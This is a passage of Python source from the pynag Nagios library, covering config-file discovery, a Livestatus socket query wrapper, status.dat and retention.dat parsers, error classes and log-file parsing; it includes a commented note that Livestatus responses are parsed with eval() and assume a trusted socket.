                    # Nagios doesn't care if cfg_dir exists or not, so why should we?
                    if not self.isdir(current_directory):
                        continue
                    for item in self.listdir(current_directory):
                        # Append full path to file
                        item = "%s" % (os.path.join(current_directory, item.strip()))
                        # Follow symlinks to their target before classifying
                        if self.islink(item):
                            item = os.readlink(item)
                        if self.isdir(item):
                            directories.append(item)
                        # was: raw_file_list.count(item) < 1 -- `not in`
                        # short-circuits on the first match and reads better
                        if item not in raw_file_list:
                            raw_file_list.append(item)
                for raw_file in raw_file_list:
                    if raw_file.endswith('.cfg'):
                        if self.exists(raw_file) and not self.isdir(raw_file):
                            # Nagios doesn't care if cfg_file exists or not, so we will not throw errors
                            cfg_files.append(raw_file)

        return cfg_files

    def abspath(self, path):
        """ Return the absolute path of a given relative path.

        The current working directory is assumed to be the dirname of nagios.cfg

        Args:

            path: relative path to be transformed into absolute path. (string)

        Returns:

            Absolute path of given relative path.

        Raises:

            ValueError: If ``path`` is not a string.

        Example:

            >>> c = config(cfg_file="/etc/nagios/nagios.cfg")
            >>> c.abspath('nagios.cfg')
            '/etc/nagios/nagios.cfg'
            >>> c.abspath('/etc/nagios/nagios.cfg')
            '/etc/nagios/nagios.cfg'

        """
        if not isinstance(path, str):
            # Bugfix: this used to *return* the ValueError instance instead of
            # raising it, silently handing callers an exception object as a path.
            raise ValueError("Path must be a string got %s instead" % type(path))
        if path.startswith('/'):
            return path
        nagiosdir = os.path.dirname(self.cfg_file)
        normpath = os.path.abspath(os.path.join(nagiosdir, path))
        return normpath

    def get_cfg_value(self, key):
        """ Returns one specific value from your nagios.cfg file,
        None if value is not found.

        Arguments:

            key: what attribute to fetch from nagios.cfg (example: "command_file" )

        Returns:

            String with the first value found for ``key``, or None.

        Example:

            >>> c = Config() # doctest: +SKIP
            >>> log_file = c.get_cfg_value('log_file') # doctest: +SKIP
            # Should return something like "/var/log/nagios/nagios.log"
        """
        # Parse the main config lazily on first use
        if not self.maincfg_values:
            self.parse_maincfg()
        # First match wins; directives may legally appear more than once
        return next((value for directive, value in self.maincfg_values if directive == key), None)

    def get_object_types(self):
        """ Returns a list of all discovered object types

        Returns:

            List of type names (e.g. ['host', 'service', ...]) derived by
            stripping the "all_" prefix from the keys of self.data.
        """
        # List comprehension instead of map(): returns a real list on
        # Python 3 as well, where map() yields a lazy iterator.
        return [re.sub("all_", "", x) for x in self.data.keys()]

    def cleanup(self):
        """ Remove configuration files that have no configuration items """
        for filename in self.cfg_files:
            # parse_file() returns an empty list for files with no objects
            if self.parse_file(filename):
                continue
            self.remove(filename)
            # If nagios.cfg references the removed file directly via a
            # cfg_file directive, drop that directive as well
            for key, value in self.maincfg_values:
                if key == 'cfg_file' and value == filename:
                    self._edit_static_file(key, old_value=value, new_value=None)

    def __setitem__(self, key, item):
        # Dict-style write access to the parsed configuration data.
        self.data[key] = item

    def __getitem__(self, key):
        # Dict-style read access to the parsed configuration data.
        return self.data[key]


class Livestatus(object):

    """ Wrapper around MK-Livestatus

    Example usage::

        s = Livestatus()
        for hostgroup in s.get_hostgroups():
            print(hostgroup['name'], hostgroup['num_hosts'])
    """

    def __init__(self, livestatus_socket_path=None, nagios_cfg_file=None, authuser=None):
        """ Initialize a new instance of Livestatus

        Args:

          livestatus_socket_path: Path to livestatus socket (if none specified,
          use one specified in nagios.cfg)

          nagios_cfg_file: Path to your nagios.cfg. If None then try to
          auto-detect

          authuser: If specified. Every data pulled is with the access rights
          of that contact.

        """
        self.nagios_cfg_file = nagios_cfg_file
        # Last exception raised by test(); None until a test fails
        self.error = None
        if not livestatus_socket_path:
            # Auto-detect the socket by parsing nagios.cfg
            c = config(cfg_file=nagios_cfg_file)
            c.parse_maincfg()
            self.nagios_cfg_file = c.cfg_file
            # Look for a broker_module line in the main config and parse its arguments
            # One of the arguments is path to the file socket created
            for k, v in c.maincfg_values:
                if k == 'broker_module' and "livestatus.o" in v:
                    for arg in v.split()[1:]:
                        # First argument that looks like a path (or has no
                        # key=value shape) is taken as the socket path
                        if arg.startswith('/') or '=' not in arg:
                            livestatus_socket_path = arg
                            break
                    else:
                        # If we get here, then we could not locate a broker_module argument
                        # that looked like a filename
                        msg = "No Livestatus socket defined. Make sure livestatus broker module is loaded."
                        raise ParserError(msg)
        self.livestatus_socket_path = livestatus_socket_path
        self.authuser = authuser

    def test(self, raise_error=True):
        """ Test if connection to livestatus socket is working

        Args:

            raise_error: If set to True, raise exception if test fails,otherwise return False

        Raises:

            ParserError if raise_error == True and connection fails

        Returns:

            True -- Connection is OK
            False -- there are problems and raise_error==False

        """
        try:
            self.query("GET hosts")
        except Exception:
            t, e = sys.exc_info()[:2]
            self.error = e
            if raise_error:
                raise ParserError("got '%s' when testing livestatus socket. error was: '%s'" % (type(e), e))
            else:
                return False
        return True

    def _get_socket(self):
        """ Returns a socket.socket() instance to communicate with livestatus

        Socket might be either unix filesocket or a tcp socket depending on
        the content of :py:attr:`livestatus_socket_path`

        Returns:

            Socket to livestatus instance (socket.socket)

        Raises:

            :py:class:`LivestatusNotConfiguredException` on failed connection.

            :py:class:`ParserError` If could not parse configured TCP address
            correctly.

        """
        if not self.livestatus_socket_path:
            msg = "We could not find path to MK livestatus socket file. Make sure MK livestatus is installed and configured"
            raise LivestatusNotConfiguredException(msg)
        try:
            if self.livestatus_socket_path.find(':') > 0:
                # A colon in the path means "address:port", i.e. a TCP socket
                address, tcp_port = self.livestatus_socket_path.split(':', 1)
                if not tcp_port.isdigit():
                    msg = 'Could not parse host:port "%s". %s  does not look like a valid port is not a valid tcp port.'
                    raise ParserError(msg % (self.livestatus_socket_path, tcp_port))
                connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                connection.connect((address, int(tcp_port)))
            else:
                # No colon -- treat the path as a unix domain socket file
                connection = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
                connection.connect(self.livestatus_socket_path)
            return connection
        except IOError:
            t, e = sys.exc_info()[:2]
            msg = "%s while connecting to '%s'. Make sure nagios is running and mk_livestatus loaded."
            raise ParserError(msg % (e, self.livestatus_socket_path))

    def query(self, query, *args, **kwargs):
        """ Performs LQL queries against the livestatus socket

        Queries are corrected and convenient default data are added to the
        query before sending it to the socket.

        Args:

            query: Query to be passed to the livestatus socket (string)

            args, kwargs: Additional parameters that will be sent to
            :py:meth:`pynag.Utils.grep_to_livestatus`. The result will be
            appended to the query.

        Returns:

            Answer from livestatus. It will be in python format unless specified
            otherwise.

        Raises:

            :py:class:`ParserError` if problems connecting to livestatus.

        """

        # columns parameter is here for backwards compatibility only
        kwargs.pop('columns', None)

        # We break query up into a list of commands, then before sending to the socket
        # we will write it one line per item in the array
        query = query.split('\n')
        query += pynag.Utils.grep_to_livestatus(*args, **kwargs)

        def _has_directive(prefix):
            # True if any line of the query already starts with `prefix`.
            # any() works on both python 2 and 3; the previous
            # `if not filter(...)` idiom relied on filter() returning a
            # list and silently always evaluated truthy on python 3.
            return any(x.startswith(prefix) for x in query)

        # If no response header was specified, we add fixed16
        response_header = None
        if not _has_directive('ResponseHeader:'):
            query.append("ResponseHeader: fixed16")
            response_header = "fixed16"

        # If no specific outputformat is requested, we will return in python format
        python_format = False
        if not _has_directive('OutputFormat:'):
            query.append("OutputFormat: python")
            python_format = True

        # There is a bug in livestatus where if requesting Stats, then no column headers are sent from livestatus
        # In later version, the headers are sent, but the output is corrupted.
        #
        # We maintain consistency by clinging on to the old bug, and if there are Stats in the output
        # we will not ask for column headers
        doing_stats = _has_directive('Stats:')
        if not doing_stats and not _has_directive('ColumnHeaders: on'):
            query.append("ColumnHeaders: on")

        # Check if we need to add authuser to the query
        if not _has_directive('AuthUser:') and self.authuser not in (None, ''):
            query.append("AuthUser: %s" % self.authuser)

        # When we reach here, we are done adding options to the query, so we convert to the string that will
        # be sent to the livestatus socket
        query = '\n'.join(query) + '\n'
        self.last_query = query

        #
        # Lets create a socket and see if we can write to it
        #
        s = self._get_socket()
        try:
            s.send(query)
        except IOError:
            msg = "Could not write to socket '%s'. Make sure you have the right permissions"
            raise ParserError(msg % self.livestatus_socket_path)
        s.shutdown(socket.SHUT_WR)
        tmp = s.makefile()

        # Read the response header from livestatus
        if response_header == "fixed16":
            response_data = tmp.readline()
            if len(response_data) == 0:
                return []
            return_code = response_data.split()[0]
            if not return_code.startswith('2'):
                error_message = tmp.readline().strip()
                raise ParserError("Error '%s' from livestatus: %s" % (return_code, error_message))

        answer = tmp.read()
        # We are done with the livestatus socket. lets close it
        s.close()

        if answer == '':
            return []

        # If something other than python format was requested, we return the answer as is
        if python_format is False:
            return answer

        # If we reach down here, it means we are supposed to parse the output before returning it
        try:
            # SECURITY NOTE: "OutputFormat: python" responses are parsed with
            # eval(), which executes arbitrary expressions. Only point this
            # class at a trusted livestatus socket.
            answer = eval(answer)
        except Exception:
            raise ParserError("Error, could not parse response from livestatus.\n%s" % answer)

        # Workaround for livestatus bug, where column headers are not provided even if we asked for them
        if doing_stats is True and len(answer) == 1:
            return answer[0]

        columns = answer.pop(0)

        # Lets throw everything into a hashmap before we return
        result = []
        for line in answer:
            tmp = {}
            for i, column in enumerate(line):
                column_name = columns[i]
                tmp[column_name] = column
            result.append(tmp)
        return result

    def get(self, table, *args, **kwargs):
        """ Same as self.query('GET %s' % (table,))

        Extra arguments will be appended to the query.

        Args:

            table: Table from which the data will be retrieved

            args, kwargs: These will be appendend to the end of the query to
            perform additionnal instructions.

        Example::

            get('contacts', 'Columns: name alias')

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET %s' % (table,), *args, **kwargs)

    def get_host(self, host_name):
        """ Performs a GET query for a particular host

        This performs::

            '''GET hosts
            Filter: host_name = %s''' % host_name

        Args:

            host_name: name of the host to obtain livestatus data from

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET hosts', 'Filter: host_name = %s' % host_name)[0]

    def get_service(self, host_name, service_description):
        """ Performs a GET query for a particular service

        This performs::

            '''GET services
            Filter: host_name = %s
            Filter: service_description = %s''' % (host_name, service_description)

        Args:

            host_name: name of the host the target service is attached to.

            service_description: Description of the service to obtain livestatus
            data from.

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET services', 'Filter: host_name = %s' % host_name,
                          'Filter: description = %s' % service_description)[0]

    def get_hosts(self, *args, **kwargs):
        """ Performs a GET query for all hosts

        This performs::

            '''GET hosts %s %s''' % (*args, **kwargs)

        Args:

            args, kwargs: These will be appendend to the end of the query to
            perform additionnal instructions.

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET hosts', *args, **kwargs)

    def get_services(self, *args, **kwargs):
        """ Performs a GET query for all services

        This performs::

            '''GET services
            %s %s''' % (*args, **kwargs)

        Args:

            args, kwargs: These will be appendend to the end of the query to
            perform additionnal instructions.

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET services', *args, **kwargs)

    def get_hostgroups(self, *args, **kwargs):
        """ Performs a GET query for all hostgroups

        This performs::

            '''GET hostgroups
            %s %s''' % (*args, **kwargs)

        Args:

            args, kwargs: These will be appendend to the end of the query to
            perform additionnal instructions.

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET hostgroups', *args, **kwargs)

    def get_servicegroups(self, *args, **kwargs):
        """ Performs a GET query for all servicegroups

        This performs::

            '''GET servicegroups
            %s %s''' % (*args, **kwargs)

        Args:

            args, kwargs: These will be appendend to the end of the query to
            perform additionnal instructions.

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET servicegroups', *args, **kwargs)

    def get_contactgroups(self, *args, **kwargs):
        """ Performs a GET query for all contactgroups

        This performs::

            '''GET contactgroups
            %s %s''' % (*args, **kwargs)

        Args:

            args, kwargs: These will be appendend to the end of the query to
            perform additionnal instructions.

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET contactgroups', *args, **kwargs)

    def get_contacts(self, *args, **kwargs):
        """ Performs a GET query for all contacts

        This performs::

            '''GET contacts
            %s %s''' % (*args, **kwargs)

        Args:

            args, kwargs: These will be appendend to the end of the query to
            perform additionnal instructions.

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET contacts', *args, **kwargs)

    def get_contact(self, contact_name):
        """ Performs a GET query for a particular contact

        This performs::

            '''GET contacts
            Filter: contact_name = %s''' % contact_name

        Args:

            contact_name: name of the contact to obtain livestatus data from

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET contacts', 'Filter: contact_name = %s' % contact_name)[0]

    def get_servicegroup(self, name):
        """ Performs a GET query for a particular servicegroup

        This performs::

            '''GET servicegroups
            Filter: servicegroup_name = %s''' % servicegroup_name

        Args:

            servicegroup_name: name of the servicegroup to obtain livestatus data from

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET servicegroups', 'Filter: name = %s' % name)[0]

    def get_hostgroup(self, name):
        """ Performs a GET query for a particular hostgroup

        This performs::

            '''GET hostgroups
            Filter: hostgroup_name = %s''' % hostgroup_name

        Args:

            hostgroup_name: name of the hostgroup to obtain livestatus data from

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET hostgroups', 'Filter: name = %s' % name)[0]

    def get_contactgroup(self, name):
        """ Performs a GET query for a particular contactgroup

        This performs::

            '''GET contactgroups
            Filter: contactgroup_name = %s''' % contactgroup_name

        Args:

            contactgroup_name: name of the contactgroup to obtain livestatus data from

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET contactgroups', 'Filter: name = %s' % name)[0]


class RetentionDat(object):

    """ Easy way to parse the content of retention.dat

    After calling parse() contents of retention.dat are kept in self.data

    Example Usage::

        r = retention()
        r.parse()
        print r
        print r.data['info']
    """

    def __init__(self, filename=None, cfg_file=None):
        """ Initilize a new instance of retention.dat

        Args (you only need to provide one of these):

            filename: path to your retention.dat file

            cfg_file: path to your nagios.cfg file, path to retention.dat will
            be looked up in this file

        """
        # If filename is not provided, lets try to discover it from
        # nagios.cfg
        if filename is None:
            c = config(cfg_file=cfg_file)
            for key, value in c._load_static_file():
                if key == "state_retention_file":
                    filename = value

        self.filename = filename
        self.data = None

    def parse(self):
        """ Parses your status.dat/retention.dat file and stores in a dictionary under self.data

        Returns:

            None

        Raises:

            :py:class:`ParserError`: if problem arises while reading status.dat

            :py:class:`ParserError`: if status.dat is not found

            :py:class:`IOError`: if status.dat cannot be read
        """
        self.data = {}
        status = {}  # Holds all attributes of a single item
        key = None  # if within definition, store everything before =
        value = None  # if within definition, store everything after =
        if not self.filename:
            raise ParserError("status.dat file not found")
        # NOTE(review): file is opened in binary mode, so on python 3 these
        # lines would be bytes -- presumably python 2 code. TODO confirm.
        lines = open(self.filename, 'rb').readlines()
        for sequence_no, line in enumerate(lines):
            line_num = sequence_no + 1
            # Cleanup and line skips
            line = line.strip()
            if line == "":
                pass
            elif line[0] == "#" or line[0] == ';':
                pass
            elif line.find("{") != -1:
                # "<type> {" opens a new object definition
                status = {}
                status['meta'] = {}
                status['meta']['type'] = line.split("{")[0].strip()
            elif line.find("}") != -1:
                # Status definition has finished, lets add it to
                # self.data
                if status['meta']['type'] not in self.data:
                    self.data[status['meta']['type']] = []
                self.data[status['meta']['type']].append(status)
            else:
                # Inside a definition: either a "key=value" attribute line or
                # a continuation of a multi-line long_plugin_output value
                tmp = line.split("=", 1)
                if len(tmp) == 2:
                    (key, value) = line.split("=", 1)
                    status[key] = value
                elif key == "long_plugin_output":
                    # special hack for long_output support. We get here if:
                    # * line does not contain {
                    # * line does not contain }
                    # * line does not contain =
                    # * last line parsed started with long_plugin_output=
                    status[key] += "\n" + line
                else:
                    raise ParserError("Error on %s:%s: Could not parse line: %s" % (self.filename, line_num, line))

    def __setitem__(self, key, item):
        # Dict-style write access to the parsed retention data.
        self.data[key] = item

    def __getitem__(self, key):
        # Dict-style read access to the parsed retention data.
        return self.data[key]

    def __str__(self):
        if not self.data:
            self.parse()
        str_buffer = "# Generated by pynag"
        for datatype, datalist in self.data.items():
            for item in datalist:
                str_buffer += "%s {\n" % datatype
                for attr, value in item.items():
                    str_buffer += "%s=%s\n" % (attr, value)
                str_buffer += "}\n"
        return str_buffer


class StatusDat(RetentionDat):

    """ Easy way to parse status.dat file from nagios

    After calling parse() contents of status.dat are kept in status.data
    Example usage::

        >>> s = status()
        >>> s.parse()
        >>> keys = s.data.keys()
        >>> 'info' in keys
        True
        >>> 'programstatus' in keys
        True
        >>> for service in s.data.get('servicestatus',[]):
        ...     host_name=service.get('host_name', None)
        ...     description=service.get('service_description',None)

    """

    def __init__(self, filename=None, cfg_file=None):
        """ Initialize a new instance of StatusDat.

        Args (you only need to provide one of these):

            filename: path to your status.dat file

            cfg_file: path to your nagios.cfg file, path to status.dat will be
            looked up in this file

        """
        if filename is None:
            # No explicit path given -- look up the status_file directive
            # in nagios.cfg instead
            c = config(cfg_file=cfg_file)
            for directive, path in c._load_static_file():
                if directive == "status_file":
                    filename = path

        self.filename = filename
        self.data = None

    def get_contactstatus(self, contact_name):
        """ Returns a dictionary derived from status.dat for one particular contact

        Args:

            contact_name: `contact_name` field of the contact's status.dat data
            to parse and return as a dict.

        Returns:

            dict derived from status.dat for the contact.

        Raises:

            ValueError if object is not found

        Example:

            >>> s = status()
            >>> first_contact = s.data['contactstatus'][0]['contact_name']
            >>> s.get_contactstatus(first_contact)['contact_name'] == first_contact
            True
        """
        # Parse lazily on first access
        if self.data is None:
            self.parse()
        for i in self.data['contactstatus']:
            if i.get('contact_name') == contact_name:
                return i
        # Bugfix: previously *returned* the ValueError instance instead of
        # raising it (inconsistent with get_hoststatus / get_servicestatus).
        raise ValueError(contact_name)

    def get_hoststatus(self, host_name):
        """ Returns a dictionary derived from status.dat for one particular host

        Args:

            host_name: `host_name` field of the host's status.dat data
            to parse and return as a dict.

        Returns:

            dict derived from status.dat for the host.

        Raises:

            ValueError if object is not found
        """
        # Parse lazily on first access
        if self.data is None:
            self.parse()
        for entry in self.data['hoststatus']:
            if entry.get('host_name') == host_name:
                return entry
        raise ValueError(host_name)

    def get_servicestatus(self, host_name, service_description):
        """ Returns a dictionary derived from status.dat for one particular service

        Args:

            host_name: `host_name` field of the service's status.dat data.

            service_description: `service_description` field of the service's
            status.dat data.

        Returns:

            dict derived from status.dat for the service.

        Raises:

            ValueError if object is not found
        """
        # Parse lazily on first access
        if self.data is None:
            self.parse()
        for entry in self.data['servicestatus']:
            if entry.get('host_name') == host_name and entry.get('service_description') == service_description:
                return entry
        raise ValueError(host_name, service_description)


class ObjectCache(Config):

    """ Loads the configuration as it appears in objects.cache file """

    def get_cfg_files(self):
        # objects.cache is a single file, named by the object_cache_file
        # directive in the main configuration
        for directive, value in self.maincfg_values:
            if directive == 'object_cache_file':
                return [value]


class ParserError(Exception):

    """ ParserError is used for errors that the Parser has when parsing config.

    Typical usecase when there is a critical error while trying to read configuration.
    """
    # Class-level defaults so __str__ is safe even when no item was given
    filename = None
    line_start = None
    message = None

    def __init__(self, message, item=None):
        """ Creates an instance of ParserError

        Args:

            message: Message to be printed by the error

            item: Pynag item who caused the error

        """
        self.message = message
        if item is not None:
            self.item = item
            meta = item['meta']
            self.filename = meta['filename']
            self.line_start = meta.get('line_start')

    def __str__(self):
        text = self.message
        # Add location info when the offending item is known
        if self.filename and self.line_start:
            text = '%s in %s, line %s' % (text, self.filename, self.line_start)
        return repr(text)


class ConfigFileNotFound(ParserError):

    """ Raised when no nagios.cfg-style configuration file can be located. """


class LivestatusNotConfiguredException(ParserError):

    """ Raised when autodiscovery of the livestatus socket path fails. """


class LogFiles(object):

    """ Parses Logfiles defined in nagios.cfg and allows easy access to its content

    Content is stored in python-friendly arrays of dicts. Output should be more
    or less compatible with mk_livestatus log output
    """

    def __init__(self, maincfg=None):
        """ Creates a LogFiles instance

        Args:

            maincfg: Path to nagios.cfg. If None, the default is autodiscovered.
        """
        self.config = config(maincfg)

        # Locations of the active log file and the archive directory,
        # as configured in nagios.cfg
        self.log_file = self.config.get_cfg_value('log_file')
        self.log_archive_path = self.config.get_cfg_value('log_archive_path')

    def get_log_entries(self, start_time=None, end_time=None, strict=True, search=None, **kwargs):
        """ Get Parsed log entries for given timeperiod.

         Args:
            start_time: unix timestamp. if None, return all entries from today

            end_time: If specified, only fetch log entries older than this (unix
            timestamp)

            strict: If True, only return entries between start_time and
            end_time, if False, then return entries that belong to same log
            files as given timeset

            search: If provided, only return log entries that contain this
            string (case insensitive)

            kwargs: All extra arguments are provided as filter on the log
            entries. f.e. host_name="localhost"

         Returns:

            List of dicts
        """
        now = time.time()
        if end_time is None:
            end_time = now
        if start_time is None:
            if 'filename' in kwargs:
                # A specific file was requested, so look arbitrarily far back
                start_time = 1
            else:
                # Default to all entries since midnight today
                seconds_in_a_day = 60 * 60 * 24
                seconds_today = end_time % seconds_in_a_day  # midnight of today
                start_time = end_time - seconds_today
        start_time = int(start_time)
        end_time = int(end_time)

        logfiles = self.get_logfiles()
        # list() so the result supports .reverse() on both Python 2 and 3
        if 'filename' in kwargs:
            logfiles = list(filter(lambda x: x == kwargs.get('filename'), logfiles))

        # If start time was provided, skip all files that we last modified
        # before start_time
        if start_time:
            logfiles = list(filter(lambda x: start_time <= os.stat(x).st_mtime, logfiles))

        # Log entries are returned in ascending order, which is the opposite of
        # what get_logfiles returns.
        logfiles.reverse()

        result = []
        for log_file in logfiles:
            entries = self._parse_log_file(filename=log_file)
            if len(entries) == 0:
                continue
            first_entry = entries[0]

            # Whole file is newer than the requested range, nothing to collect
            if first_entry['time'] > end_time:
                continue
            # If strict, filter entries to only include the ones in the timespan
            if strict is True:
                entries = [x for x in entries if x['time'] >= start_time and x['time'] <= end_time]
            # If search string provided, filter the string
            if search is not None:
                entries = [x for x in entries if x['message'].lower().find(search.lower()) > -1]
            # Any remaining keyword arguments act as exact-match filters on
            # the parsed entry fields, e.g. host_name="localhost"
            for k, v in kwargs.items():
                entries = [x for x in entries if x.get(k) == v]
            result += entries

        # Now, logfiles should in MOST cases come sorted for us.
        # However we rely on modification time of files and if it is off,
        # We want to make sure log entries are coming in the correct order.
        # The following sort should not impact performance in the typical use case.
        result.sort(key=lambda x: x.get('time'))

        return result

    def get_logfiles(self):
        """ Returns a list with the fullpath to every log file used by nagios.

        Lists are sorted by modification times. Newest logfile is at the front
        of the list so usually nagios.log comes first, followed by archivelogs

        Returns:

            List of strings

        """
        logfiles = []

        for filename in os.listdir(self.log_archive_path):
            full_path = "%s/%s" % (self.log_archive_path, filename)
            logfiles.append(full_path)
        logfiles.append(self.log_file)

        # Sort the logfiles by modification time, newest file at the front
        logfiles.sort(key=lambda x: int(os.stat(x).st_mtime))

        # Newest logfiles go to the front of the list
        logfiles.reverse()

        return logfiles

    def get_flap_alerts(self, **kwargs):
        """ Same as :py:meth:`get_log_entries`, except return only flapping alerts.

        Takes same parameters.
        """
        # _parse_log_line tags FLAPPING ALERT entries with class_name
        # 'flapping' (the old filter "timeperiod transition" matched nothing).
        return self.get_log_entries(class_name="flapping", **kwargs)

    def get_notifications(self, **kwargs):
        """ Same as :py:meth:`get_log_entries`, except return only notifications.
        Takes same parameters.
        """
        return self.get_log_entries(class_name="notification", **kwargs)

    def get_state_history(self, start_time=None, end_time=None, host_name=None, strict=True, service_description=None):
        """ Returns a list of dicts, with the state history of hosts and services.

        Args:

           start_time: unix timestamp. if None, return all entries from today

           end_time: If specified, only fetch log entries older than this (unix
           timestamp)

           host_name: If provided, only return log entries whose host_name
           matches exactly

           service_description: If provided, only return log entries whose
           service_description matches exactly

        Returns:

            List of dicts with state history of hosts and services
        """

        log_entries = self.get_log_entries(start_time=start_time, end_time=end_time, strict=strict, class_name='alerts')
        result = []
        # Tracks the most recent entry seen per "host/service" so that each
        # entry can be annotated with duration and previous_state.
        last_state = {}
        now = time.time()

        for line in log_entries:
            if 'state' not in line:
                continue
            line['duration'] = now - int(line.get('time'))
            if host_name is not None and host_name != line.get('host_name'):
                continue
            if service_description is not None and service_description != line.get('service_description'):
                continue
            if start_time is None:
                start_time = int(line.get('time'))

            short_name = "%s/%s" % (line['host_name'], line['service_description'])
            if short_name in last_state:
                # Close the previous state interval for this host/service
                last = last_state[short_name]
                last['end_time'] = line['time']
                last['duration'] = last['end_time'] - last['time']
                line['previous_state'] = last['state']
            last_state[short_name] = line

            if strict is True:
                if start_time is not None and int(start_time) > int(line.get('time')):
                    continue
                if end_time is not None and int(end_time) < int(line.get('time')):
                    continue

            result.append(line)
        return result

    def _parse_log_file(self, filename=None):
        """ Parses one particular nagios logfile into arrays of dicts.

        Args:

            filename: Log file to be parsed. If is None, then log_file from
            nagios.cfg is used.

        Returns:

            A list of dicts containing all data from the log file
        """
        if filename is None:
            filename = self.log_file
        result = []
        # 'with' guarantees the file handle is closed (previously leaked)
        with open(filename) as log:
            for line in log:
                parsed_entry = self._parse_log_line(line)
                if parsed_entry != {}:
                    parsed_entry['filename'] = filename
                    result.append(parsed_entry)
        return result

    def _parse_log_line(self, line):
        """ Parse one particular line in nagios logfile and return a dict.

        Args:

            line: Line of the log file to be parsed.

        Returns:

            dict containing the information from the log file line.
            Empty dict if the line is not in recognizable format.
        """
        host = None
        service_description = None
        state = None
        check_attempt = None
        plugin_output = None
        contact = None

        # Every parseable line looks like: [timestamp] LOGTYPE: options
        m = re.search(r'^\[(.*?)\] (.*?): (.*)', line)
        if m is None:
            return {}
        line = line.strip()
        timestamp, logtype, options = m.groups()

        result = {}
        try:
            timestamp = int(timestamp)
        except ValueError:
            timestamp = 0
        result['time'] = int(timestamp)
        result['type'] = logtype
        result['options'] = options
        result['message'] = line
        result['class'] = 0  # unknown
        result['class_name'] = 'unclassified'
        if logtype in ('CURRENT HOST STATE', 'CURRENT SERVICE STATE', 'SERVICE ALERT', 'HOST ALERT'):
            result['class'] = 1
            result['class_name'] = 'alerts'
            if logtype.find('HOST') > -1:
                # This matches host current state:
                m = re.search(r'(.*?);(.*?);(.*);(.*?);(.*)', options)
                if m is None:
                    return result
                host, state, hard, check_attempt, plugin_output = m.groups()
                service_description = None
            if logtype.find('SERVICE') > -1:
                m = re.search(r'(.*?);(.*?);(.*?);(.*?);(.*?);(.*)', options)
                if m is None:
                    return result
                host, service_description, state, hard, check_attempt, plugin_output = m.groups()
            result['host_name'] = host
            result['service_description'] = service_description
            result['state'] = int(pynag.Plugins.state[state])
            result['check_attempt'] = check_attempt
            result['plugin_output'] = plugin_output
            result['text'] = plugin_output
        elif "NOTIFICATION" in logtype:
            result['class'] = 3
            result['class_name'] = 'notification'
            if logtype == 'SERVICE NOTIFICATION':
                m = re.search(r'(.*?);(.*?);(.*?);(.*?);(.*?);(.*)', options)
                if m is None:
                    return result
                contact, host, service_description, state, command, plugin_output = m.groups()
            elif logtype == 'HOST NOTIFICATION':
                m = re.search(r'(.*?);(.*?);(.*?);(.*?);(.*)', options)
                if m is None:
                    return result
                contact, host, state, command, plugin_output = m.groups()
                service_description = None
            result['contact_name'] = contact
            result['host_name'] = host
            result['service_description'] = service_description
            try:
                result['state'] = int(pynag.Plugins.state[state])
            except Exception:
                # Notification "state" may be a command like ACKNOWLEDGEMENT
                result['state'] = -1
            result['plugin_output'] = plugin_output
            result['text'] = plugin_output
        elif logtype == "EXTERNAL COMMAND":
            result['class'] = 5
            result['class_name'] = 'command'
            m = re.search(r'(.*?);(.*)', options)
            if m is None:
                return result
            command_name, text = m.groups()
            result['command_name'] = command_name
            result['text'] = text
        elif logtype in ('PASSIVE SERVICE CHECK', 'PASSIVE HOST CHECK'):
            result['class'] = 4
            result['class_name'] = 'passive'
            if logtype.find('HOST') > -1:
                # This matches host current state:
                m = re.search(r'(.*?);(.*?);(.*)', options)
                if m is None:
                    return result
                host, state, plugin_output = m.groups()
                service_description = None
            if logtype.find('SERVICE') > -1:
                m = re.search(r'(.*?);(.*?);(.*?);(.*)', options)
                if m is None:
                    return result
                host, service_description, state, plugin_output = m.groups()
            result['host_name'] = host
            result['service_description'] = service_description
            result['state'] = state
            result['plugin_output'] = plugin_output
            result['text'] = plugin_output
        elif logtype in ('SERVICE FLAPPING ALERT', 'HOST FLAPPING ALERT'):
            result['class_name'] = 'flapping'
        elif logtype == 'TIMEPERIOD TRANSITION':
            result['class_name'] = 'timeperiod_transition'
        elif logtype == 'Warning':
            result['class_name'] = 'warning'
            result['state'] = "1"
            result['text'] = options
        if 'text' not in result:
            result['text'] = result['options']
        result['log_class'] = result['class']  # since class is a python keyword
        return result


class ExtraOptsParser(object):

    """ Get Nagios Extra-Opts from a config file as specified by http://nagiosplugins.org/extra-opts

    We could ALMOST use pythons ConfParser but nagios plugin team thought it would be a
    good idea to support multiple values per key, so a dict datatype no longer works.

    Its a shame because we have to make our own "ini" parser as a result

    Usage::

        # cat /etc/nagios/plugins.ini
        [main]
        host_name = localhost
        [other section]
        host_name = example.com
        # EOF

        e = ExtraOptsParser(section_name='main', config_file='/etc/nagios/plugins.ini')
        e.get('host_name')  # returns "localhost"
        e.get_values()  # Returns a dict of all the extra opts
        e.getlist('host_name')  # returns all values of host_name (if more than one were specified) in a list

    """
    # Well-known ini locations, checked in order when NAGIOS_CONFIG_PATH
    # does not yield a config file
    standard_locations = [
        "/etc/nagios/plugins.ini",
        "/usr/local/nagios/etc/plugins.ini",
        "/usr/local/etc/nagios/plugins.ini",
        "/etc/opt/nagios/plugins.ini",
        "/etc/nagios-plugins.ini",
        "/usr/local/etc/nagios-plugins.ini",
        "/etc/opt/nagios-plugins.ini",
    ]

    def __init__(self, section_name=None, config_file=None):
        """ Creates an ExtraOptsParser

        Args:

            section_name: ini section to read options from. Defaults to the
            basename of the script being run (per the extra-opts spec).

            config_file: ini file to parse. Defaults to the first readable
            file found via NAGIOS_CONFIG_PATH or the standard locations.
        """
        if not section_name:
            section_name = self.get_default_section_name()
        if not config_file:
            config_file = self.get_default_config_file()
        self.section_name = section_name
        self.config_file = config_file
        # parse_file() returns {} when config_file is None
